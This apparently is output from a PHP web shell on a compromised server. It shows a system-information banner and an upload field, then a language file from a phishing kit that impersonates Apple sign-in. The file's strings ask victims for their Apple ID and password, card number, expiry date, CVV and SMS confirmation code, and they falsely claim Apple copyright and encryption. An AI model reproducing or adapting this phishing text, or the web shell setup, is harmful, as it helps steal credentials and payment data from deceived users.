AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK
| Server IP : 146.190.157.162 / Your IP : 216.73.216.175 Web Server : Apache System : Linux ubuntu-s-2vcpu-4gb-amd-sfo3-01-KIT-DIGITAL 6.5.0-44-generic #44-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 7 15:10:09 UTC 2024 x86_64 User : vergeskit ( 679) PHP Version : 8.2.10-2ubuntu2.2 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_signal,pcntl_signal_dispatch,pcntl_getpriority,pcntl_setpriority,dl,putenv,parse_ini_file,show_source MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/html/vergeskit/Apple/langs/lang/ |
Upload File : |
<?php
$lang = array(
"_login_title" => "Sign in.",
"_login_subtitle" => "Sign in to your Apple account",
"_apple_id_placeholder" => "Apple ID",
"_password_placeholder" => "Password",
"_remember_me" => "Remember me",
"_forgot_apple_id" => "Forgot Apple ID or password?",
"_create_apple_id" => "Don’t have an Apple ID? Create yours now.",
"_need_help" => "Need some help? Chat now or call 1-800-MY-APPLE.",
"_encryption_notice" => "The Apple Online Store uses industry-standard encryption to protect the confidentiality of the information you submit. Learn more about our Security Policy.",
"_more_ways_to_shop" => "More ways to shop: Find an Apple Store or other retailer near you. Or call 1-800-MY-APPLE.",
"_copyright" => "Copyright © 2024 Apple Inc. All rights reserved.",
"_payment_info_title" => "Payment Information.",
"_add_card_subtitle" => "Add credit or debit card.",
"_full_name_placeholder" => "Full name",
"_card_number_placeholder" => "XXXX XXXX XXXX XXXX",
"_exp_date_placeholder" => "MM/YY",
"_cvv_placeholder" => "CVV",
"_continue_button" => "Continue",
"_confirmation_title" => "Confirmation.",
"_confirmation_subtitle" => "Enter confirmation code we sent to your number.",
"_sms_code_placeholder" => "SMS CODE",
"_incorrect_code" => "Incorrect code",
"_request_new_code" => "Request new code.",
"_new_code_sent" => "We have sent a new code."
);
?>